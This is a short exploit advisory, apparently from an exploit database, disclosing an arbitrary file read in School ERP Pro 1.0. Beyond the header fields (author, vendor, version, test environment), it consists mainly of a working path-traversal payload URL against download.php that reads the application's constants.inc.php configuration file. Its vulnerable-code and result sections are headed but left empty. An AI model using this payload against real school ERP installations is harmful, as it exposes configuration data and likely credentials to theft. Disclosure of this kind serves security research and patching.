# Exploit Title: School ERP Pro 1.0 - Arbitrary File Read # Date: 2020-04-28 # Author: Besim ALTINOK # Vendor Homepage: http://arox.in # Software Link: https://sourceforge.net/projects/school-erp-ultimate/ # Version: latest version # Tested on: Xampp # Credit: İsmail BOZKURT # CVE: N/A Vulnerable code: (/student_staff/download.php) - File Name: download.php - Content of the download.php ------------ *Payload:* --------------- http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php ------------------------ *After run payload: (we accessed of the file content)* ------------------------